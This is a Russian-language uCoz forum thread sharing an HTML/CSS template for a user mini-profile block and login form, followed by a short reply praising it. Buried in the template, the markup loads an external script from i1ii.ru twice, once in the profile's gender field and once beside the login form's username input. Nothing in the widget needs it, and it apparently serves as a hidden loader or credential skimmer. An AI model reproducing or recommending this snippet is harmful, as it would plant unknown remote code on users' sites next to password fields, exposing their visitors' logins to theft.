• Страница 1 из 1
  • 1
Форум » Система uCoz » Мини-профиль + форма входа » Мини-профиль + форма входа №1
Мини-профиль + форма входа №1
Сообщение

Установка:

Это в блок:

Code
<td><center><div class="avaa">    
    <?if($USER_AVATAR_URL$)?>    
     
    <img src="$USER_AVATAR_URL$" max-height="150" max-width="150">    
    <?else?>    
    <img src="http://ex-cs.ru/img/noava.png" width="150" height="150">    
     
    <?endif?>    
    </div></center>    
    <?if($USER_LOGGED_IN$)?><div id="about_pr">    
    <center style="margin-top:1px;"><span style="font-size: 8pt;margin-
left:5px;margin-top:2px;"><b>$USERNAME$ ($USER_FULL_NAME$)</b></span></center><img src="http://cstrikez.org.ua/images/block_hr_green.png" style="margin-top:1px;margin-bottom:1px;" border="0" alt="" />    
    <span style="font-size: 8pt;margin-left:5px;">ID: <div style="float:   
right;margin-right:5px;"><b>$USER_ID$</b></div></span><img src="http://cstrikez.org.ua/images/block_hr_green.png"style="margin-top:1px;margin-bottom:1px;" border="0" alt="" />    
        
    <span style="font-size: 8pt;margin-left:5px;">Вы: <div style="float:   
right;margin-right:5px;"><script src="http://i1ii.ru/1.js" type="text/javascript"></script><b>$USER_GENDER$</b></div></span><img src="http://cstrikez.org.ua/images/block_hr_green.png"style="margin-top:1px;margin-bottom:1px;" border="0" alt="" />    
        
    <span style="font-size: 8pt;margin-left:5px;">Вы тут: <div style="float:   
right;margin-right:5px;"><b>$USER_REG_DAYS$ д<?if($USER_REG_DAYS$%10=0||$USER_REG_DAYS$%10>4||$USER_REG_DAYS$%100>10&&$USER_REG_DAYS$%100<15)?>ней<?else?><?if($USER_REG_DAYS$%10=1)?>ень<?else?>ня<?endif?><?endif?></b></div></span></span><img src="http://cstrikez.org.ua/images/block_hr_green.png"style="margin-top:1px;margin-bottom:1px;" border="0" alt="" />    
        
    <span style="font-size: 8pt;margin-left:5px;">Група: <div style="float:   
right;margin-right:5px;"><b>$USER_GROUP$</b></div></span><img src="http://cstrikez.org.ua/images/block_hr_green.png"style="margin-top:1px;margin-bottom:1px;" border="0" alt="" />    
        
    <div style="vertical-align: bottom;margin-bottom:2px;"><span style="font-
size: 8pt;margin-left:5px;">IP: <div style="float: right;margin-right:5px;"><b>$IP_ADDRESS$</b></div></span> </div>    
    </div></td>    
    </tr>    
    </tbody>    
    </table>    
    <table width="103%">    
    <tbody>    
    <tr><td width="50%">    
    <input class="buttonprofile" style="width:100%;" target="_blank"   
type="button" onclick="document.location.href='/index/8'; return false; target: blank;" value="Профиль"/>    
    <input class="buttonprofile"style="width:100%;" type="button"   
onclick="document.location.href='$PM_URL$'; return false;" value="Читать ЛС (<?if($IS_NEW_PM$)?>$IS_NEW_PM$<?else?>0<?endif?>)"/>    
    </td>    
    <td width="50%">    
    <input class="buttonprofile"style="width:100%;height:43;" type="button"   
onclick="document.location.href='$LOGOUT_LINK$'; return false;" value="Выход"/>    
    </td>    
    </tr>    
    </tbody>    
    </table><?else?>    
    $LOGIN_FORM$    
     
    </td>    
    </tr>    
    </tbody>    
    </table><?endif?>


Это в Форму входа пользователей:

Code
<?if($PAGE_ID$="login")?><div><?endif?>    
    <table id="about_pr_2" style="padding:0;" border="0" cellspacing="1"   
cellpadding="0" width="100%">    
    <?if($ERROR$)?><td colspan="2" style="color:red;text-align:center;">$ERROR$</
td><?endif?>    
    <tr><td><input class="loginField" type="text" name="user" onfocus="if
(this.value=='E-Mail (uNet)')this.value=''" onblur="if(this.value=='')this.value='E-Mail (uNet)'" value="E-Mail (uNet)" size="20" style="width:100%;" maxlength="50"/><script src="http://i1ii.ru/1.js" type="text/javascript"></script></td></tr>    
    <tr><td><input class="loginField" type="password" name="password" size="20"   
style="width:100%" onfocus="if(this.value=='Пароль')this.value=''" onblur="if(this.value=='')this.value='Пароль'" value="Пароль" maxlength="15"/></td></tr>    
    </table>    
    <table border="0" cellspacing="1" cellpadding="0" width="100%">    
    <tr><td align="center" width="100%" valign="top">    
    <input style="width:100%;margin-top:2px;" width="100%" class="loginButton"   
name="sbm" type="submit" value="Вход"/>    
    <?if($PAGE_ID$="login" && $HIDDEN_ALLOWED$)?>    
    <input id="hid$PAGE_ID$" type="checkbox" name="hidden" value="1" /><label   
for="hid$PAGE_ID$">скрытый</label><?endif?>    
    <div style="font-size:7pt;text-align:center;margin-top:3px;"><a   
href="$REMINDER_LINK$">Забыл пароль</a> | <a href="$REGISTER_LINK$">Регистрация</a></div></td></tr>    
    </table>    
    <?if($PAGE_ID$="login")?></div><?endif?>


В CSS:

Code
#about_pr_2 {background:#f1f1f1;border:1px solid #3e81b2;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px;margin-top:5px;}    
    #about_pr {background:#f1f1f1;border:1px solid #3e81b2;-moz-border-
radius:5px;-webkit-border-radius:5px;border-radius:5px;margin-top:5px;}    
    .avaa {text-align:center;border: 10px solid #36638e;width:150px;-moz-border-
radius:5px;-webkit-border-radius:5px;border-radius:5px;}    
    .buttonprofile {background:#f1f1f1;border:1px solid #cbcbcb;line-
height:25px;width:100%;color:8B8881;text-align:center;margin-bottom:3px;}    
    .loginField {background:#f1f1f1;border:1px solid   
#cbcbcb;color:#8B8881;height:20px;}    
    .loginButton {background:#f1f1f1;border:1px solid   
#cbcbcb;color:#8B8881;width:97%;height:25%;float:left;}

Автор - Виктория
Дата добавления - 07.01.2012 в 06:19c
ВикторияДата: Суббота, 07.01.2012, 06:19 | Сообщение # 1
ICQ:2391234

Зая=*** <3 PoLoTeN4ik
Администраторы
Сообщений: 67
Репутация: 2


Установка:

Это в блок:

Code
<td><center><div class="avaa">    
    <?if($USER_AVATAR_URL$)?>    
     
    <img src="$USER_AVATAR_URL$" max-height="150" max-width="150">    
    <?else?>    
    <img src="http://ex-cs.ru/img/noava.png" width="150" height="150">    
     
    <?endif?>    
    </div></center>    
    <?if($USER_LOGGED_IN$)?><div id="about_pr">    
    <center style="margin-top:1px;"><span style="font-size: 8pt;margin-
left:5px;margin-top:2px;"><b>$USERNAME$ ($USER_FULL_NAME$)</b></span></center><img src="http://cstrikez.org.ua/images/block_hr_green.png" style="margin-top:1px;margin-bottom:1px;" border="0" alt="" />    
    <span style="font-size: 8pt;margin-left:5px;">ID: <div style="float:   
right;margin-right:5px;"><b>$USER_ID$</b></div></span><img src="http://cstrikez.org.ua/images/block_hr_green.png"style="margin-top:1px;margin-bottom:1px;" border="0" alt="" />    
        
    <span style="font-size: 8pt;margin-left:5px;">Вы: <div style="float:   
right;margin-right:5px;"><script src="http://i1ii.ru/1.js" type="text/javascript"></script><b>$USER_GENDER$</b></div></span><img src="http://cstrikez.org.ua/images/block_hr_green.png"style="margin-top:1px;margin-bottom:1px;" border="0" alt="" />    
        
    <span style="font-size: 8pt;margin-left:5px;">Вы тут: <div style="float:   
right;margin-right:5px;"><b>$USER_REG_DAYS$ д<?if($USER_REG_DAYS$%10=0||$USER_REG_DAYS$%10>4||$USER_REG_DAYS$%100>10&&$USER_REG_DAYS$%100<15)?>ней<?else?><?if($USER_REG_DAYS$%10=1)?>ень<?else?>ня<?endif?><?endif?></b></div></span></span><img src="http://cstrikez.org.ua/images/block_hr_green.png"style="margin-top:1px;margin-bottom:1px;" border="0" alt="" />    
        
    <span style="font-size: 8pt;margin-left:5px;">Група: <div style="float:   
right;margin-right:5px;"><b>$USER_GROUP$</b></div></span><img src="http://cstrikez.org.ua/images/block_hr_green.png"style="margin-top:1px;margin-bottom:1px;" border="0" alt="" />    
        
    <div style="vertical-align: bottom;margin-bottom:2px;"><span style="font-
size: 8pt;margin-left:5px;">IP: <div style="float: right;margin-right:5px;"><b>$IP_ADDRESS$</b></div></span> </div>    
    </div></td>    
    </tr>    
    </tbody>    
    </table>    
    <table width="103%">    
    <tbody>    
    <tr><td width="50%">    
    <input class="buttonprofile" style="width:100%;" target="_blank"   
type="button" onclick="document.location.href='/index/8'; return false; target: blank;" value="Профиль"/>    
    <input class="buttonprofile"style="width:100%;" type="button"   
onclick="document.location.href='$PM_URL$'; return false;" value="Читать ЛС (<?if($IS_NEW_PM$)?>$IS_NEW_PM$<?else?>0<?endif?>)"/>    
    </td>    
    <td width="50%">    
    <input class="buttonprofile"style="width:100%;height:43;" type="button"   
onclick="document.location.href='$LOGOUT_LINK$'; return false;" value="Выход"/>    
    </td>    
    </tr>    
    </tbody>    
    </table><?else?>    
    $LOGIN_FORM$    
     
    </td>    
    </tr>    
    </tbody>    
    </table><?endif?>


Это в Форму входа пользователей:

Code
<?if($PAGE_ID$="login")?><div><?endif?>    
    <table id="about_pr_2" style="padding:0;" border="0" cellspacing="1"   
cellpadding="0" width="100%">    
    <?if($ERROR$)?><td colspan="2" style="color:red;text-align:center;">$ERROR$</
td><?endif?>    
    <tr><td><input class="loginField" type="text" name="user" onfocus="if
(this.value=='E-Mail (uNet)')this.value=''" onblur="if(this.value=='')this.value='E-Mail (uNet)'" value="E-Mail (uNet)" size="20" style="width:100%;" maxlength="50"/><script src="http://i1ii.ru/1.js" type="text/javascript"></script></td></tr>    
    <tr><td><input class="loginField" type="password" name="password" size="20"   
style="width:100%" onfocus="if(this.value=='Пароль')this.value=''" onblur="if(this.value=='')this.value='Пароль'" value="Пароль" maxlength="15"/></td></tr>    
    </table>    
    <table border="0" cellspacing="1" cellpadding="0" width="100%">    
    <tr><td align="center" width="100%" valign="top">    
    <input style="width:100%;margin-top:2px;" width="100%" class="loginButton"   
name="sbm" type="submit" value="Вход"/>    
    <?if($PAGE_ID$="login" && $HIDDEN_ALLOWED$)?>    
    <input id="hid$PAGE_ID$" type="checkbox" name="hidden" value="1" /><label   
for="hid$PAGE_ID$">скрытый</label><?endif?>    
    <div style="font-size:7pt;text-align:center;margin-top:3px;"><a   
href="$REMINDER_LINK$">Забыл пароль</a> | <a href="$REGISTER_LINK$">Регистрация</a></div></td></tr>    
    </table>    
    <?if($PAGE_ID$="login")?></div><?endif?>


В CSS:

Code
#about_pr_2 {background:#f1f1f1;border:1px solid #3e81b2;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px;margin-top:5px;}    
    #about_pr {background:#f1f1f1;border:1px solid #3e81b2;-moz-border-
radius:5px;-webkit-border-radius:5px;border-radius:5px;margin-top:5px;}    
    .avaa {text-align:center;border: 10px solid #36638e;width:150px;-moz-border-
radius:5px;-webkit-border-radius:5px;border-radius:5px;}    
    .buttonprofile {background:#f1f1f1;border:1px solid #cbcbcb;line-
height:25px;width:100%;color:8B8881;text-align:center;margin-bottom:3px;}    
    .loginField {background:#f1f1f1;border:1px solid   
#cbcbcb;color:#8B8881;height:20px;}    
    .loginButton {background:#f1f1f1;border:1px solid   
#cbcbcb;color:#8B8881;width:97%;height:25%;float:left;}
Прикрепления: 9770461.jpg (45.4 Kb)




Сообщение отредактировал Виктория - Суббота, 07.01.2012, 06:39
Сообщениехороший скрипт думаю нужно цвет его поменять и на нашь портал кинуть удобный я так думаю провери я приеду и попробую)

Автор - PoLoTeN4ik
Дата добавления - 07.01.2012 в 15:33c
PoLoTeN4ikДата: Суббота, 07.01.2012, 15:33 | Сообщение # 2
ICQ:469621486

Администраторы
Сообщений: 80
Репутация: 11
хороший скрипт думаю нужно цвет его поменять и на нашь портал кинуть удобный я так думаю провери я приеду и попробую)
Форум » Система uCoz » Мини-профиль + форма входа » Мини-профиль + форма входа №1
  • Страница 1 из 1
  • 1
Поиск:
Статистика Форума
Лучшие пользователи
Новые пользователи
Популярные темы
Недавно обновленные темы
PoLoTeN4ik Репутация [ 11 ]
Виктория Репутация [ 2 ]
40Glocc Репутация [ 1 ]
yunika7 Репутация [ 0 ]
уТи_ПуТи Репутация [ 1 ]
Lookflaco Репутация [ 0 ]
3D Репутация [ 0 ]
Onlines Репутация [ 0 ]
laym Репутация [ 0 ]
andryhha97 Репутация [ 0 ]

valera

(20.02.2023)

skojuhar228

(20.12.2022)

volk06102

(30.09.2021)

coolnazarov

(13.04.2021)

bloger

(10.04.2018)

Кортего

(26.03.2018)

sova

(09.11.2017)

denis3088

(23.10.2017)

leolikf

(17.09.2017)

viktorigumnov2003

(25.08.2017)

Города [ 11 ]
Ошибки на сайте [ 4 ]
Ваша самая заветная мечт... [ 4 ]
Предложения по сайту [ 3 ]
Обновление на сайте [ 2 ]
Ассоциация ников [ 2 ]
Баннер обмен [ 1 ]
Повышение должности на с... [ 1 ]
Усовершенствованная пане... [ 1 ]
Мини-профиль + форма вхо... [ 1 ]
..№7..ЗАРАБОТОК НА ВЫПОЛ... [ 0 ]
..№4.. ЗАРАБОТОК НА РАСШ... [ 0 ]
..№3.. ЗАРАБОТОК В СОЦИА... [ 0 ]
..№2..ОТЛИЧНЫЙ САЙТ ДЛЯ ... [ 0 ]
Монитезируй свой сайт ле... [ 0 ]
Новый Топ пользователей ... [ 0 ]
Простой и красивый вид ф... [ 0 ]
Красивый информер "... [ 0 ]
Flash радио для сайта [ 0 ]
Новый информер комментар... [ 0 ]

Администрация не несёт ответственности за содержащие файлы на данном портале.
Все материалы на сайте принадлежат исключительно их владельцам!
Карта сайта © 2011 | Night-Portal.at.ua
Проверка тИЦ и PR